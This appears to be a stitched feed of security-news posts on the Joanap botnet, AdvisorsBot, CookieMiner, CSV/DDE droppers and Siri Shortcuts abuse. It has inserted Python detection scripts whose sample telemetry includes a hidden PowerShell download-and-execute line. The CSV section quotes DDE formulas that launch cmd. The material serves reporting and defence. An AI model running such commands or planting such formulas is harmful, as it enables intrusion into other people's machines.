“Computers around the world remain infected by a botnet associated with the North Korean Regime,” said Assistant Attorney General John Demers. “Through this operation, we are working to eradicate the threat that North Korea state hackers pose to the confidentiality, integrity, and availability of data. This operation is another example of the Justice Department’s efforts to use every tool at our disposal to disrupt national security threat actors, including, but by no means limited to, prosecution.”

“Through technical means and legal process, the FBI continually seeks to disrupt the malicious cyber activities of North Korean cybercriminals, as in this case, and all cyber actors who pose a threat to the United States and our international partners.” explained ADIC Paul Delacourt.

In June 2018, the FBI filed a complaint against the North Korean citizen Park Jin Hyok, an expert who works for the North Korean military intelligence agency, the Reconnaissance General Bureau (RGB).

The man, also known as Pak Jin Hek, is also linked to the dreaded Lazarus APT group; according to the authorities, he was involved in numerous computer intrusions in which he also used the Brambul malware to gain unauthorized access to computers.

“Moreover, a complaint was filed on June 8, 2018, charging Park Jin Hyok with a conspiracy to carry out numerous computer intrusions backed by the North Korean government. That complaint alleged how co-conspirators used Brambul to gain unauthorized access to computers, and then used those computers to carry out the charged malicious cyber activities. The Brambul worm itself was recovered from the computer networks of some victims of the conspiracy.”

The good news for users is that Joanap is not effective against up-to-date Microsoft Windows systems running Windows Defender and using Windows Update. Most antivirus programs are also able to detect both Joanap and Brambul.

Pierluigi Paganini

(SecurityAffairs – Joanap botnet, North Korea)

The post US authorities aim to dismantle North Korea’s Joanap Botnet appeared first on Security Affairs.



Security Affairs: The return of the AdvisorsBot malware

Security experts at Cybaze-Yoroi ZLab have analyzed a new sample of the AdvisorsBot malware, a downloader that was first spotted in August 2018.

As usual, the malware looks like a legitimate e-mail attachment, named “invoice.doc”. Today, weaponized Microsoft Office documents with macros are one of the most common and most effective methods to deliver malware, because they rely on simple social engineering tricks to lure users into enabling the macros.

The following figure shows the workflow of the infection chain:

Figure 1 – Malware’s workflow

Technical analysis

Hash (SHA-256): a3088d98d46a7202edeafeb744dbd822c647c72ce0d3949f895106ff3e201c9c
Threat: Dropper
Brief: invoice(7).doc
ssdeep: 3072:tg919RZTg8X+H4u7sFYv3Rtf7XZ7PE1MbXEy271G5FZy+1OhV5biqb09H/TrN1Wk:8iqYph1Q5O3

Table 1 – Dropper information

Hash (SHA-256): 62a7423f2ac8d80caa35fc3613b0cc6e01b22a7cb5e898176f4f42c3cf9f20be
Threat: PowerShell script
Brief: okzjtag.png (dropper/payload)
ssdeep: 192:I6P2ZF0tX6vYhscXNtP++l3p2RwPNtOZE9yHPKR4EJxT/7MZUJn7rW0v:I6P+F4ac3aRwP7d9Ic4EJxT/gZEXWq

Table 2 – Fake PNG, PowerShell script information

Once opened, the document asks the user to enable the macro scripts, which are heavily obfuscated to avoid static detection.

Figure 2 – Document view inviting to enable macro

The macro code downloads a text string through a WebClient object invoked from the PowerShell console, saves it with a .png file extension, and runs it through the “iex” primitive.

Figure 3 – Piece of VBS script that starts malware infection
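The Office-to-PowerShell chain just described is the kind of parent/child process relationship that endpoint telemetry can catch before the second stage runs. The following is an added example, not code from the Yoroi analysis: it scores constructed Sysmon-style process-creation records (the field names, the sample command lines and the marker weights are assumptions) by Office parent plus script-host child and by command-line markers such as WebClient, DownloadString and iex.

```python
from __future__ import annotations
import re

# Office applications whose child processes deserve scrutiny (assumption: a
# reasonable starting list, not an exhaustive one).
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}

# Script hosts and LOLbins a macro typically spawns to run the next stage.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
                "cmd.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe"}

# Command-line markers taken from the chain in the analysis (WebClient ->
# DownloadString -> iex) plus common hiding/encoding switches. Each carries an
# assumed weight; the sum becomes the event score.
CMDLINE_MARKERS = [
    (re.compile(r"webclient", re.I), 2),
    (re.compile(r"downloadstring|downloadfile", re.I), 3),
    (re.compile(r"\biex\b|invoke-expression", re.I), 3),
    (re.compile(r"frombase64string|-enc(odedcommand)?\b", re.I), 2),
    (re.compile(r"-w(indowstyle)?\s+hidden|-nop\b|-noprofile", re.I), 1),
    (re.compile(r"\.png['\"\s]|\.jpg['\"\s]", re.I), 1),  # fake-image stage, as with okzjtag.png
]


def score_event(event: dict) -> tuple[int, list[str]]:
    """Return (score, reasons) for one process-creation record.

    Expected keys (assumed schema): parent_image, image, command_line.
    A score of 0 means nothing in this record matched.
    """
    parent = event.get("parent_image", "").rsplit("\\", 1)[-1].lower()
    image = event.get("image", "").rsplit("\\", 1)[-1].lower()
    cmdline = event.get("command_line", "")
    score, reasons = 0, []

    if parent in OFFICE_PARENTS and image in SCRIPT_HOSTS:
        score += 5
        reasons.append(f"{parent} spawned {image}")

    for pattern, weight in CMDLINE_MARKERS:
        if pattern.search(cmdline):
            score += weight
            reasons.append(f"cmdline matches /{pattern.pattern}/")
    return score, reasons


def flag_events(events: list[dict], threshold: int = 5) -> list[dict]:
    """Return the records whose score reaches the threshold, annotated."""
    flagged = []
    for ev in events:
        score, reasons = score_event(ev)
        if score >= threshold:
            flagged.append({**ev, "score": score, "reasons": reasons})
    return flagged


# Constructed sample telemetry (not real logs): a benign Office child process,
# a benign interactive PowerShell, and one record shaped like the chain above.
SAMPLE_EVENTS = [
    {"id": 1, "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\splwow64.exe", "command_line": "splwow64.exe 12288"},
    {"id": 2, "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe Get-ChildItem C:\\Users\\alice\\Documents"},
    {"id": 3, "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": ("powershell.exe -w hidden -nop -c \"$p=$env:TEMP+'\\okzjtag.png';"
                      "(New-Object Net.WebClient).DownloadString('http://192.0.2.10/x') "
                      "| Out-File $p; iex (Get-Content $p)\"")},
]

if __name__ == "__main__":
    for hit in flag_events(SAMPLE_EVENTS):
        print(f"event {hit['id']}: score {hit['score']}: " + "; ".join(hit["reasons"]))
```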

This script contains different base64-encoded chunks of data, as shown in the following figure.

Figure 4 – Piece of code in Base64 encoded inside fake PNG image

The deobfuscation of the first chunk reveals the IP address of the C2. This address is the same one used to download the whole script.

Figure 5 – Deobfuscated C2’s IP

The second piece of script, labeled “$jdH9C”, is a compressed GzipStream object. After decoding it, we noticed that an executable file is stored within the memory stream:

Figure 6 – DLL hardcoded inside fake PNG script

The analysis of this binary is reported in the next paragraph (see “DLL Analysis”).

The last base64 chunk is directly executed through the “iex” primitive. It is interesting to note that it calls some “non-library” functions, that is, functions loaded from the previously referenced DLL file.

Within this script, we noticed a routine named “nvtTvqn” that gathers information about the victim machine.

Figure 7 – System information stolen by the malware

It retrieves:

  1. System Info;
  2. Computer IP address;
  3. Network status;
  4. List of running processes;
  5. Available privileges;
  6. Usernames;
  7. Domain Admins;
  8. File on desktop machine;
  9. AntiVirus product on computer.

Another interesting function is “j2aYhH”:

Figure 8 – Accounts and emails stealing

This function searches for all email accounts registered on the victim machine. Inside its code another routine, named “CR1Z”, is referenced; it verifies whether the Outlook client is installed.

Figure 9 – Registry key searched by the malware
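The three base64 chunks described above (a plain string holding the C2 address, a gzip-compressed DLL kept in a memory stream, and a script handed to iex) can be triaged automatically. This is an added example, not code from the Yoroi analysis: it pulls every long base64 run out of a script, decodes it, peels a gzip layer when the magic bytes call for it, labels the result by its header, and extracts URLs and IPs from text chunks. The sample script, its variable names and the fake MZ blob are constructed stand-ins, not the real okzjtag.png.

```python
import base64
import binascii
import gzip
import re

# Base64 runs long enough to be payload rather than an identifier.
B64_RUN = re.compile(r"[A-Za-z0-9+/]{20,}={0,2}")
URL_RE = re.compile(r"https?://[^\s'\"<>]+")
IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")


def classify(blob: bytes) -> str:
    """Label a decoded blob by magic bytes, falling back to printability."""
    if blob[:2] == b"\x1f\x8b":
        return "gzip"
    if blob[:2] == b"MZ":
        return "pe"
    try:
        text = blob.decode("utf-8")
    except UnicodeDecodeError:
        return "binary"
    return "text" if all(c.isprintable() or c in "\r\n\t" for c in text) else "binary"


def unpack(b64: str):
    """Decode one base64 run and peel a gzip layer if present.

    Returns (layers, payload), where layers lists what was seen at each step,
    e.g. ["gzip", "pe"] for a compressed executable, or None when the run is
    not valid base64 (a long identifier that happened to match, for instance).
    """
    try:
        raw = base64.b64decode(b64, validate=True)
    except (binascii.Error, ValueError):
        return None
    layers = [classify(raw)]
    if layers[0] == "gzip":
        try:
            raw = gzip.decompress(raw)
        except (OSError, EOFError):
            layers.append("truncated")  # partial stream: keep what we have
            return layers, raw
        layers.append(classify(raw))
    return layers, raw


def triage(script: str) -> list:
    """Walk every base64 run in a script and summarise what it hides."""
    findings = []
    for m in B64_RUN.finditer(script):
        result = unpack(m.group(0))
        if result is None:
            continue
        layers, payload = result
        indicators = []
        if layers[-1] == "text":
            text = payload.decode("utf-8")
            indicators = sorted(set(URL_RE.findall(text)) | set(IPV4_RE.findall(text)))
        findings.append({"offset": m.start(), "layers": layers,
                         "size": len(payload), "indicators": indicators})
    return findings


def _b64(data: bytes) -> str:
    return base64.b64encode(data).decode()


# Constructed stand-in for the fake-PNG PowerShell script (NOT the real
# okzjtag.png): a text chunk with the stage URL, a gzip-compressed "DLL"
# (a fake MZ/PE header padded with zeros, not a real executable), and a
# chunk of script that would be handed to iex.
_FAKE_PE = b"MZ" + b"\x90" * 62 + b"PE\x00\x00" + b"\x00" * 200
SAMPLE_SCRIPT = (
    "$c2 = [Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('"
    + _b64(b"http://192.0.2.10/okzjtag.png") + "'))\n"
    "$jdH9C = [Convert]::FromBase64String('" + _b64(gzip.compress(_FAKE_PE)) + "')\n"
    "iex ([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('"
    + _b64(b"function nvtTvqn { Get-Process | Out-String }") + "')))\n"
)

if __name__ == "__main__":
    for f in triage(SAMPLE_SCRIPT):
        print(f"offset {f['offset']:5d}: {' -> '.join(f['layers'])}, "
              f"{f['size']} bytes, indicators={f['indicators']}")
```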

DLL Analysis

As described in the previous paragraph, the PowerShell script uses functions exported by the executable.

Hash (SHA-256): 5bed1e16ec8177c92265ccfaf29666ed29b3f65f17d040a4ff356e70551d3ef0
Threat: Malware payload containing some malicious functions invoked by the PowerShell script
Brief: *.dll file (Payload)
ssdeep: 96:+8irQu26Iu2X/lZxvXZ31n2G1QmAPuvEHNeSPKw+1sxXt/WxJtMkQRO7j+gqT:+PRoViGOmFvEHNeSCp1sxdumkQbl

Table 3 – DLL information

The file is a dynamic-link library not yet known to major security platforms.

Figure 10 – DLL results on Virus Total

The library embeds MSIL code running on top of the .NET framework, so it is quite straightforward to recover its source code.

Figure 11 – Static analysis on DLL

The extracted code contains utility functions used for many purposes, for instance to generate a pseudo-random installation path.

Figure 12 – Source code of function in DLL

The “kaYchi” function, instead, accepts three parameters (id, status and post) and creates files with two different extensions: “*.asp” if the “post” variable is true and “*.jpg” otherwise.

Figure 13 – Function to generate .asp or .jpg file to write/send victim information to C2

The remote command and control server (162.244.32.180) was down at the time of writing. After the steps described above, the malware tries to download other components from it and execute them with the “iex” primitive.

The last DNS activity was in December 2018. This IP is already known to the security community and labeled as malicious. The IP is located in the US, as visible in the following figures.

Figure 14 – previous DNS of C2
Figure 15 – C2’s relation graph

The domain zosmogroel.com was active until 18-12-2018; we also found an associated certificate with the SHA-1 signature 98b637715fa6429a60eed9b58447e967bf7e1018.

Figure 16 – zosmogroel.com certificate

This signature was associated with more than 80 IP addresses; further analysis reveals that some of those IPs have been used as drop URLs for other malware samples.

The analyzed sample is AdvisorsBot, first analyzed by Proofpoint on 23 August 2018. We also found evidence on a public sandbox that, last August, the 162.244.32.180 remote C2 delivered a Ursnif/Gozi variant (162.244.32.180/yak0810.exe, SHA-256 030531a784f72f145bef98a3240283da88fe623904c066be179fbbe3a9150c48), as also confirmed by signatures on VT. This last piece of evidence may suggest that this infrastructure was used to deliver different malware.

Conclusions

Weaponized Microsoft Office documents delivered via email represent the top infection vector in today’s malware landscape; in second place we find the abuse of the Microsoft DDE protocol together with CVE-2017-11882. One reason is that, very often, macro malware does not rely on expensive-to-deploy 0-day exploits and can bypass endpoint security solutions (macros are often whitelisted in enterprise environments) thanks to extensive multi-layered obfuscation, mainly in PowerShell; broadly speaking, it has a very low barrier to entry.

Several APTs today use spear-phishing mails with weaponized Office documents as attachments. To name a few: OilRig APT used BondUpdater in a campaign discovered by FireEye in 2017 that targeted a Middle Eastern governmental organization with a malicious VBA macro that downloads a two-stage PowerShell payload.

A similar vector was used in a recent APT28 campaign targeting individuals with a specific interest in the CyCon US cybersecurity conference organized by the NATO Cooperative Cyber Defence Centre of Excellence (CCDCOE). The attackers did not use any zero-day vulnerabilities in this campaign; instead, they relied on weaponized Office documents containing VBA scripts used to deliver a new variant of Seduploader. Turla APT also used weaponized documents in its recent campaigns to deliver KopiLuwak with a heavily obfuscated JavaScript payload.

This sample shows a high level of obfuscation to defeat AV and does not use any exploit; in fact, the obfuscated DLL component was not flagged by VT (0/60) at the time of writing. Unfortunately we cannot carry on the analysis because the C2 is not reachable at the moment, but we noticed that the last DNS activity was in December 2018, with the registration of two distinct domains active for one week each (and several domains before), which suggests that this malware was developed for target-specific activities, tightening the time window to a minimum each time. Further analysis of these registered domains suggests that the whole infrastructure is fairly large (88 IPs found) and may also have been used to deliver other malware.

Researchers at Cybaze-Yoroi ZLAB advise disabling macros by default and checking the origin of e-mails in depth.

Further details, including IoCs and Yara rules, are reported in the analysis published by Cybaze-Yoroi ZLab:

https://blog.yoroi.company/research/the-return-of-advisorsbot/

Pierluigi Paganini

(SecurityAffairs – AdvisorsBot, malware)

The post The return of the AdvisorsBot malware appeared first on Security Affairs.



Hackers used Karma tool to hack iPhones of prominent Govt officials

By Uzair Amir

UAE Launched Aggressive Cyber Espionage Campaign using KARMA and Expertise of Ex-NSA Operatives. Though it seems hard to believe it is indeed true that the smartphones of several prominent political and governmental personalities worldwide have been hacked by former US intelligence officers who now work for the UAE (United Arab Emirates) government. Prominent figures targeted […]

This is a post from HackRead.com. Read the original post: Hackers used Karma tool to hack iPhones of prominent Govt officials

New Mac Malware Targets Cookies to Steal From Cryptocurrency Wallets

Mac users need to beware of a newly discovered piece of malware that steals their web browser cookies and credentials in an attempt to withdraw funds from their cryptocurrency exchange accounts. Dubbed CookieMiner due to its capability of stealing cookies-related to cryptocurrency exchanges, the malware has specifically been designed to target Mac users and is believed to be based on

Matrix Ransomware: A Threat to Low-Hanging Fruit

In its 2019 Threat Report, Sophos predicted a rise in targeted ransomware attacks. According to new research, Matrix, a copycat targeted ransomware that is flying under the radar, is one such threat that

The post Matrix Ransomware: A Threat to Low-Hanging Fruit appeared first on The Cyber Security Place.

Cisco Router Vulnerability Gives Window into Researchers’ World

In late January, researchers found a vulnerability in Cisco RV320 and RV325 routers — routers aimed at the needs of small businesses and remote offices. Cisco quickly released a software

The post Cisco Router Vulnerability Gives Window into Researchers’ World appeared first on The Cyber Security Place.

New Mac Malware steals iPhone text messages from iTunes backups

By Waqas

The IT security researchers at Palo Alto Networks’ Unit 42 have discovered a dangerous new Mac malware capable of targeting devices for multi-purposes including stealing cryptocurrency. Dubbed CookieMiner by researchers; the Mac malware is a variant of OSX.DarthMiner, another nasty piece of malware known for targeting MacOS. But, CookieMiner aims at much more than its predecessor. See: 400% increase in […]

This is a post from HackRead.com. Read the original post: New Mac Malware steals iPhone text messages from iTunes backups

Security Affairs: CookieMiner Mac Malware steals browser cookies and sensitive Data

Palo Alto Networks discovered a piece of Mac malware dubbed CookieMiner that targets browser cookies associated with cryptocurrency exchanges and wallet service websites.

Researchers from Palo Alto Networks discovered a new piece of Mac malware dubbed CookieMiner that steals browser cookies associated with cryptocurrency exchanges and wallet service websites along with other sensitive data.

The malware targets cookies associated with cryptocurrency exchanges such as Binance, Coinbase, Poloniex, Bittrex, Bitstamp, and MyEtherWallet. It also steals cookies from any website that has “blockchain” in its domain name.
CookieMiner leverages a Python script named “harmlesslittlecode.py” to steal saved login credentials and credit card information from Chrome.

CookieMiner

CookieMiner is based on the OSX.DarthMiner malware discovered by experts at Malwarebytes in December; it is able to steal browser cookies from the Chrome and Safari browsers, along with sensitive data such as user credentials saved in Chrome, credit card details saved in Chrome, iPhone text messages from backups, and cryptocurrency wallet data and keys.

“This malware is capable of stealing browser cookies associated with mainstream cryptocurrency exchanges and wallet service websites visited by the victims.” reads the analysis published by PaloAlto Networks.

“It also steals saved passwords in Chrome. By leveraging the combination of stolen login credentials, web cookies, and SMS data, based on past attacks like this, we believe the bad actors could bypass multi-factor authentication for these sites.”

Crooks aim to empty the victim’s exchange account or wallet by using a combination of stolen login credentials, web cookies, and SMS data.

Experts believe the threat actors could bypass multifactor authentication for the sites for which they are able to steal associated info.

CookieMiner configures the compromised systems to load coin-mining software that looks like an XMRig-type miner but that mines Koto, a less popular cryptocurrency associated with Japan.

Like DarthMiner, the malware leverages the EmPyre backdoor as a post-exploitation agent; it checks whether the Little Snitch firewall is running on the target host and aborts the installation if it is.

“The malware ‘CookieMiner’ is intended to help threat actors generate profit by collecting credential information and mining cryptocurrency. If attackers have all the needed information for the authentication process, the multi-factor authentication may be defeated.” Palo Alto Networks concludes.

“Cryptocurrency owners should keep an eye on their security settings and digital assets to prevent compromise and leakage.”

Further details, including IoCs, are reported in the analysis published by Palo Alto Networks.

Pierluigi Paganini

(SecurityAffairs – CookieMiner, cryptocurrency malware)

The post CookieMiner Mac Malware steals browser cookies and sensitive Data appeared first on Security Affairs.



Security Affairs

CookieMiner Mac Malware steals browser cookies and sensitive Data

Palo Alto Networks discovered a piece of Mac malware dubbed CookieMiner that is targeting browser cookies associated with cryptocurrency exchanges and wallet service websites..

Researchers from Palo Alto Networks discovered a new piece of Mac malware dubbed CookieMiner that steals browser cookies associated with cryptocurrency exchanges and wallet service websites along with other sensitive data.

The malware targets cookies associated with cryptocurrency exchanges such as Binance, Coinbase, Poloniex, Bittrex, Bitstamp, and MyEtherWallet. It would steal cookies aby website that has “blockchain” in their domain name.
CookieMiner leverages a Python script named “harmlesslittlecode.py.” to steal saved login credentials and credit card information from Chrome.

CookieMiner

CookieMiner is based in the OSX.DarthMiner malware that was discovered by experts at Malwarebytes in December, it is able to steal browser cookies from Chrome and Safari browsers and also sensitive data such as user credentials, in Chrome, saved credit card credentials in Chrome, iPhone text messages from backups and cryptocurrency wallet data and keys.

“This malware is capable of stealing browser cookies associated with mainstream cryptocurrency exchanges and wallet service websites visited by the victims.” reads the analysis published by PaloAlto Networks.

“It also steals saved passwords in Chrome. By leveraging the combination of stolen login credentials, web cookies, and SMS data, based on past attacks like this, we believe the bad actors could bypass multi-factor authentication for these sites. “

Crooks aim to empty the victim’s exchange account or wallet by using a combination of stolen login credentials, web cookies, and SMS data.

Experts believe the threat actors could bypass multi-factor authentication on the sites for which they manage to steal the associated information.

CookieMiner configures the compromised system to load coin-mining software that looks like an XMRig-type miner but actually mines Koto, a less popular cryptocurrency associated with Japan.

Like DarthMiner, the malware relies on the EmPyre backdoor as a post-exploitation agent; it checks whether the Little Snitch firewall is running on the target host and aborts the installation if it is.

“The malware ‘CookieMiner’ is intended to help threat actors generate profit by collecting credential information and mining cryptocurrency. If attackers have all the needed information for the authentication process, the multi-factor authentication may be defeated.” Palo Alto Networks concludes.

“Cryptocurrency owners should keep an eye on their security settings and digital assets to prevent compromise and leakage.”

Further details, including IoCs, are reported in the analysis published by Palo Alto Networks.

Pierluigi Paganini

(SecurityAffairs – CookieMiner, cryptocurrency malware)

The post CookieMiner Mac Malware steals browser cookies and sensitive Data appeared first on Security Affairs.

New Mac malware steals cookies, cryptocurrency and computing power

A new piece of Mac malware is looking to steal both the targets’ computing power and their cryptocurrency stash, Palo Alto Networks researchers warn. About the CookieMiner malware Dubbed CookieMiner on account of its cookie-stealing capabilities, this newly discovered malware is believed to be based on DarthMiner, another recently detected Mac malware that combines the EmPyre backdoor and the XMRig cryptominer. Like DarthMiner, CookieMiner uses the EmPyre backdoor for post-exploitation control. This agent checks if … More

The post New Mac malware steals cookies, cryptocurrency and computing power appeared first on Help Net Security.

Radware Blog: Attackers Are Leveraging Automation

Cybercriminals are weaponizing automation and machine learning to create increasingly evasive attack vectors, and the internet of things (IoT) has proven to be the catalyst driving this trend. IoT is the birthplace of many of the new types of automated bots and malware. At the forefront are botnets, which are increasingly sophisticated, lethal and highly automated digitized […]

The post Attackers Are Leveraging Automation appeared first on Radware Blog.




Selfie stealing malware found in popular Android beauty camera apps

By Waqas

We all want to look perfect in the pictures that we post online and beauty camera apps are our best bet in order to fine-tune our pictures. However, according to the findings of Trend Micro researchers, these kinds of applications are performing more functions than what we think they are. Reportedly, some of the Android […]

This is a post from HackRead.com Read the original post: Selfie stealing malware found in popular Android beauty camera apps

Top 10 Best Antivirus software for 2019

By Zehra Ali

Open the Internet and your screen will be flooded with hacking news and exploits carried out through the use of sophisticated techniques. It is not uncommon to land on news reports of millions of compromised Internet devices. These stories emerge not merely because of the hacker’s expertise, although this plays a large part. Just as crucial is the lack […]

This is a post from HackRead.com Read the original post: Top 10 Best Antivirus software for 2019

Exclusive: spreading CSV Malware via Google Sheets

Cyber security expert Marco Ramilli, founder of Yoroi, discovered a way to spread CSV malware via Google Sheets … but Big G says it is an “Intended behavior”.

A .CSV file can be a malware carrier, and if it is interpreted by Microsoft Excel it can become a malware executor! When I personally saw this technique back in 2017 (please take a look here, here and here) I was fascinated. A simple and sweet textual file forcing the behaviour of powerful and protected machines: no macros, no Visual Basic, no exploits were involved. Indeed, if you have ever installed Microsoft Excel on your Windows box you probably know that when you click on a common .CSV file, MS Excel starts up, opens the selected .CSV file and interprets the cell contents. But what if an attacker writes malicious content into one or more cells? I personally had never received and/or analysed such a dropper until a few days ago, when one appeared in my spam-box; it quickly became a mandatory analysis for my personal experience :P.

Dropper .CSV

A series of empty fields precedes a final, fake formula that pipes a command to CMD.exe, which is spawned. Using the bitsadmin technique, the attacker downloads a file called now.exe and stores it in a temporary system folder for later execution. In this specific case the downloaded malware happens to be a variant of the NanoCore RAT, but that is not my point for today. If you are interested in the malware analysis of now.exe, please read here.

At that time the attacker forced the Dynamic Data Exchange (DDE) protocol for interprocess communication, which is supported by Microsoft Excel, LibreOffice and Apache OpenOffice. For example, the following formula on OpenOffice will run calc.exe (CVE-2014-3524).

=DDE("cmd";"/C calc";"__DdeLink_60_870516294")

On Microsoft Excel the same result can be reached by introducing the following formula:

=cmd|' /C calc'!A0

While OpenOffice and LibreOffice patched this vulnerability in OpenOffice 4.1.1 (ref here) and LibreOffice 4.3.1 (ref here) respectively, Microsoft decided to allow this behaviour, introducing two user “warnings” instead.
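A defender-side check for the two DDE forms quoted above, as an added example (not code from the original post): it walks a CSV, flags any cell a spreadsheet would evaluate, marks the `=app|topic!item` and `=DDE(...)` launch forms separately, and defangs formula cells with the usual apostrophe prefix. The sample CSV is constructed here to mimic the dropper layout (a run of empty fields, then the formula).

```python
import csv
import io
import re

# Leading characters that make Excel / LibreOffice / OpenOffice evaluate a
# CSV cell as a formula instead of displaying it as text.
FORMULA_TRIGGERS = ("=", "+", "-", "@")

# Signatures of the two DDE forms shown in the post:
#   Excel:      =cmd|' /C calc'!A0          (application|topic!item pipe syntax)
#   OpenOffice: =DDE("cmd";"/C calc";"...")
DDE_PATTERNS = (
    re.compile(r"^\s*=\s*[\w.]+\s*\|.*!", re.IGNORECASE),
    re.compile(r"^\s*=\s*DDE\s*\(", re.IGNORECASE),
)


def is_formula_cell(cell: str) -> bool:
    """True if a spreadsheet would evaluate this cell rather than show it.

    Plain signed numbers such as "-12.50" or "+3" also begin with a trigger
    character but are harmless, so they are excluded."""
    text = cell.lstrip()
    if not text or text[0] not in FORMULA_TRIGGERS:
        return False
    try:
        float(text)
        return False
    except ValueError:
        return True


def is_dde_cell(cell: str) -> bool:
    """True if the cell matches one of the DDE command-launch forms."""
    return any(p.search(cell) for p in DDE_PATTERNS)


def scan_csv(text: str):
    """Return (row, column, cell, kind) for every suspicious cell.

    kind is "dde" for a DDE launch formula and "formula" for any other
    cell a spreadsheet would evaluate."""
    findings = []
    for r, row in enumerate(csv.reader(io.StringIO(text))):
        for c, cell in enumerate(row):
            if is_dde_cell(cell):
                findings.append((r, c, cell, "dde"))
            elif is_formula_cell(cell):
                findings.append((r, c, cell, "formula"))
    return findings


def neutralise_cell(cell: str) -> str:
    """Prefix a formula cell with an apostrophe, the common CSV-injection
    mitigation: the spreadsheet then treats the content as literal text."""
    return "'" + cell if is_formula_cell(cell) else cell


def neutralise_csv(text: str) -> str:
    """Rewrite a CSV so that no cell will be evaluated when it is opened."""
    out = io.StringIO()
    writer = csv.writer(out, lineterminator="\n")
    for row in csv.reader(io.StringIO(text)):
        writer.writerow([neutralise_cell(cell) for cell in row])
    return out.getvalue()


# Constructed sample: a run of empty fields followed by the two
# calc-launching formulas from the post (double quotes inside a quoted
# CSV field are doubled).
SAMPLE_CSV = (
    "name,amount,note\n"
    "alice,-12.50,paid\n"
    ",,,,,,,,,,,,,,,,,,\n"
    ",,,\"=cmd|' /C calc'!A0\"\n"
    ",,,\"=DDE(\"\"cmd\"\";\"\"/C calc\"\";\"\"__DdeLink_60_870516294\"\")\"\n"
    "bob,+3,@sum\n"
)

if __name__ == "__main__":
    for r, c, cell, kind in scan_csv(SAMPLE_CSV):
        print(f"row {r} col {c} [{kind}]: {cell}")
    print(neutralise_csv(SAMPLE_CSV))
```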

Microsoft Excel User Warnings before letting run DDE content

These warnings recommend that the user shouldn’t click if they do not trust the source of the file… here we go! What if you received this file from a Google spreadsheet? Ok, maybe nobody in the cybersecurity community would trust a spreadsheet coming from a random Google Sheets user, but many people out there would trust Google Sheets without wondering who really sits behind the shared document.

Google Sheets spreading .CSV dropper

In 2019 the most interesting thing about this technique is its ability to bypass Google filters. By using the .csv dropper technique an attacker could easily use Google Sheets as a malware vector. Google implements sophisticated GMail and gDrive anti-malware measures to prevent malware from spreading over its technologies (for example, it scans files before they are uploaded to or downloaded from gDrive (ref: here), and it blocks specific file types such as .exe, .dll and .zip over GMail (read more here)), but this time it seems not to be as “sensible” to such an issue. Google has been alerted about this issue, but it confirmed that it is actually an “Intended Behaviour”.

Google Ticket Changed on Intended Behaviour

Finally, an attacker could send a plain link over an instant messaging platform and/or over email asking the victim to open a Google Sheets document, suggesting that they open the spreadsheet locally because of “MS Excel compatibility issues”. If the victim downloads the Google Sheets file and opens it locally (with Microsoft Excel), the attacker might infect her box.

I really hope that Google will, at least, try to avoid being used as an attack vector, as it does with many other technologies; in the meantime, please be aware of this issue, and if you receive a link to a non-working Google Sheets document, please do not download it locally.

Further information, including IoCs, is reported in the blog post published by Marco Ramilli.

Pierluigi Paganini

(SecurityAffairs – Google Sheets, hacking)

The post Exclusive: spreading CSV Malware via Google Sheets appeared first on Security Affairs.

Hey Siri, Get My Coffee, Hold the Malware

With Apple’s introduction of iOS 12 for all their supported mobile devices came a powerful new utility for automation of common tasks called Siri Shortcuts. This new feature can be enabled via third-party developers in their apps, or custom built by users downloading the shortcuts app from the app store. Once downloaded and installed, the Shortcuts app grants the power of scripting to perform complex tasks on users’ personal devices.

But accessing the phone from Siri Shortcuts also presents some potential security risks that were discovered by X-Force IRIS and reported to Apple’s security team. This post gives some insight into potential attack scenarios using Shortcuts and reminds users that keeping a tight lid on app permissions is a critical step to upping security on devices and the way we use them.

Shortcuts Make Life Easier, Right?

Want to turn all your lights to disco, play your favorite soundtrack, and text your friends to come over? Or maybe perform complex mathematical computations with a single voice command? Siri Shortcuts can help do that and facilitate much more in user interaction with their devices, directly from the lock screen or via existing apps they use. These shortcuts can also be shared between users, using the app itself via iCloud, which means they can be passed around rather easily.

Beyond users wishing to automate daily activities, app developers can create shortcuts and present them to their user base from within their apps. The shortcut can then appear on the lock screen or in ‘search’ when it is deemed appropriate to show it to the user based on time, location and context. For example, a user approaches their usual coffee shop, and the relevant app pops up a shortcut on the screen to allow them to order the usual cup of java and pay for it on the app before they even enter the coffee shop.

These shortcuts are a nifty addition to Siri’s functionality, but while allowing extended functionality and personalization of the use of Siri, there are some less favorable scenarios to consider.

Siri Shortcuts Can Also Be Abused by Attackers

Siri Shortcuts can be a useful tool for both users and app developers who wish to enhance the level of interaction users have with their apps. But this access can potentially also be abused by malicious third parties. According to X-Force IRIS research, there are security concerns that should be taken into consideration in using Siri Shortcuts.

Siri Demanding Ransom?

Shortcuts could be used for malicious purposes such as scareware: a pseudo-ransom campaign that tries to scare victims into paying a criminal by making them believe their data is in the hands of a remote attacker.

Using native shortcut functionality, a script could be created to speak the ransom demands to the device’s owner by using Siri’s voice. To lend more credibility to the scheme, attackers can automate data collection from the device and have it send back the user’s current physical address, IP address, contents of the clipboard, stored pictures/videos, contact information and more. This data can be displayed to the user to convince them that an attacker can make use of it unless they pay a ransom.

To move the user to the ransom payment stage, the shortcut could automatically access the Internet, browsing to a URL that contains payment information for cryptocurrency wallets, and demand that the user pay up or see their data deleted or exposed on the Internet.

The More the Merrier

To add to this scenario, the malicious shortcut could also be configured to spread to other devices by messaging everyone on the victim’s contact list, prompting them to download and install the same shortcut. This would be a cost-effective and hard-to-detect distribution method, since the message comes from a trusted contact.

In a video we created, we show how native functionality can be used to make convincing ransom threats to someone running a malicious Siri Shortcut.

Pay attention to the following steps taking place in the video:

  1. The shortcut is configured to gather personal data from the device:
  • It can collect photos from the camera roll.
  • Grab the contents of the clipboard.
  • Get the physical address of the device’s location.
  • Find the external IP address.
  • Get the device’s model.
  • Get the device’s current mobile carrier.
